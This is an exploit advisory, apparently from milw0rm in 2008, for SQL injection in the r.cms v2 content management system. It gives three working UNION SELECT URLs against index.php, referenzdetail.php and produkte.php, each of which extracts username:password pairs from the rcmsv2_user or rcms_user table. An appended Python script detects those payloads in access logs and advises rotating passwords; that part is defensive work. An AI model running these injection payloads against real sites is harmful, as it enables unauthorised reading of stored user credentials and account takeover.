r.cms v2 Multiple SQL Injection Vulnerabilities

###############################################################
#
#       r.cms V2 - Multiple SQL Injection Vulnerabilities
#
#       Vulnerability discovered by: Lidloses_Auge
#       Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
#                                    Palme, GPM, Free-Hack
#       Date:                        16.12.2008
#
###############################################################
#
#       Admin Panel: [Target]/rcms/
#       Description: Almost every GET parameter is vulnerable
#                    to SQL Injection, so I won't list 'em all.
#                    There are two possible tables which contain
#                    user data, depending on the CMS version.
#                    Table:
#                            rcmsv2
#                    or:
#                            rcms
#
#                    The Columns for username and password are:
#                            username
#                            userpassword
#
###############################################################

http://xxx/index.php?id=1+union+select+1,2,3,4,5,concat(username,0x3a,userpassword),7,8,9+from+rcmsv2_user/*
http://xxx/referenzdetail.php?id=-6+union+select+1,2,3,4,5,6,concat(username,0x3a,userpassword),8,9,10,11+from+rcms_user/*
http://xxx/produkte.php?id=-2+union+select+1,2,3,4,5,6,7,8,concat(username,0x3a,userpassword),10,11+from+rcmsv2_user/*

# milw0rm.com [2008-12-17]
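
Added example (not part of the original advisory): a log check for sites that ran r.cms v2, flagging requests whose id parameter matches the request pattern listed above. The log lines are constructed samples, and it is an assumption that a legitimate id is always a non-negative integer.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; client addresses and timestamps are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [17/Dec/2008:10:01:02 +0000] "GET /index.php?id=12 HTTP/1.1" 200 5120
198.51.100.9 - - [17/Dec/2008:10:02:41 +0000] "GET /index.php?id=1+union+select+1,2,3,4,5,concat(username,0x3a,userpassword),7,8,9+from+rcmsv2_user/* HTTP/1.1" 200 6011
198.51.100.9 - - [17/Dec/2008:10:03:05 +0000] "GET /referenzdetail.php?id=-6%20UNION%20SELECT%201,2+from+rcms_user/* HTTP/1.1" 200 4800
203.0.113.4 - - [17/Dec/2008:10:04:00 +0000] "GET /produkte.php?id=abc HTTP/1.1" 200 300
203.0.113.5 - - [17/Dec/2008:10:05:00 +0000] "GET /produkte.php?id=3&lang=de HTTP/1.1" 200 7100
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION = re.compile(r'\bunion\b.*\bselect\b', re.I | re.S)
# Table and column names taken from the advisory text.
CRED_REF = re.compile(r'\b(?:userpassword|rcms(?:v2)?_user)\b', re.I)

def classify(value):
    """Return None for a plain non-negative integer id, else a severity label."""
    if value.isascii() and value.isdigit():
        return None
    if UNION.search(value):
        return "union-select+credentials" if CRED_REF.search(value) else "union-select"
    return "non-numeric"

def scan(log_text):
    """Return (client, path, label) for every suspicious id parameter in the log."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        # parse_qs decodes both %xx and '+', so encoded variants are normalised first
        for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            label = classify(value)
            if label:
                findings.append((client, parts.path, label))
    return findings

if __name__ == "__main__":
    for client, path, label in scan(SAMPLE_LOG):
        print(f"{client}\t{path}\t{label}")
```

A "union-select+credentials" hit that was answered with status 200 means the account table may have been read, so the stored passwords should be treated as exposed and rotated.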




Lidloses_Auge, 12/17/2008

				